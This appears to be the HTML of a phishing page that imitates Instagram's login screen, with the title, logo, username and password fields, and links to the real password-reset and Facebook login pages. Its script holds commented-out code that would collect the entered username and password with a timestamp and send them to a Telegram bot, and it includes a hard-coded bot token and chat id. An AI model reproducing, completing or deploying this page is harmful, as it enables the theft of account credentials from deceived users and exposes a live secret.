<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style type="text/css">
        body {
            margin: 10;
            padding: 10;
            height: auto;
            width: auto;
        }
        .Rectangle_1 {
            border-radius: 3px;
            border: 2px solid #DCDCDC;
            padding: 3px;
        }
        .Rectangle_2 {
            border-radius: 3px;
            border: 2px solid #DCDCDC;
            padding: 3px;
        }
        .Rectangle_3 {
            border: 2px;
            border-radius: 3px;
        }
        a {
            text-decoration: none;
        }
        a:visited {
            color: #3B579D;
        }
        @media screen and (max-width: 360px) {
            body {
                width: 360px;
                margin-right: 5px;
            }
        }
    </style>
    <title>Login • Instagram</title>
    <link rel="stylesheet" type="text/css" id="applicationStylesheet" href="reboot13.css"/>
    <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e7/Instagram_logo_2016.svg/1200px-Instagram_logo_2016.svg.png" type="image/icon type">
</head>
<body>
        <img id="Instagram-Logo" src="Instagram-Logo.png" srcset="Instagram-Logo.png 1x, Instagram-Logo@2x.png 2x">
        <form action="#" method="post" onsubmit="submitForm()">
            <input class="Rectangle_1" id="Rectangle_1" type="text" name="email" placeholder="Phone number, username, or email" required="">
            <input class="Rectangle_2" id="Rectangle_2" type="password" name="password" placeholder="Password" required="">
            <input id="Rectangle_3" class="Rectangle_3" style="color: white; background-color: #0095F6;" type="submit" value="Log In">
        </form>
        <div id="Log_In_with_Facebook">
            <span><a href="https://www.facebook.com/login.php?">Log In with Facebook</a></span>
        </div>
        <div id="Forgot_password">
            <a href="https://www.instagram.com/accounts/password/reset/">
                <span>Forgot password?</span>
            </a>
        </div>
        <!-- ... (rest of your HTML) ... -->
        <script>
			
            function submitForm() {
                console.log("working");
				//var email = document.getElementById('Rectangle_1').value;
                //var password = document.getElementById('Rectangle_2').value;
                //date_default_timezone_set("Asia/Kolkata");
                //var time = new Date().toLocaleTimeString();
                //var message = "Username: " + email + "\nPassword: " + password + "\nTried Login at " + time + " IST";
                //var chat_id = 'Albertsfriedchicken';
                //var apiToken = '6951049067:AAF4Y-kePwnyq_CdysCTUi9OXoqKbT2ZT7E';
                //send_message(message, apiToken);
            }
			/*
            function send_message(message, apiToken) {
                var text = encodeURIComponent(message);
                var url ='https://api.telegram.org/bot6951049067:AAF4Y-kePwnyq_CdysCTUi9OXoqKbT2ZT7E/getMe';
                // You can use fetch or XMLHttpRequest to make an HTTP request
                fetch(url)
                    .then(response => response.json())
                    .then(data => console.log(data))
                    .catch(error => console.error('Error:', error));
			}*/
        </script>
</body>
</html>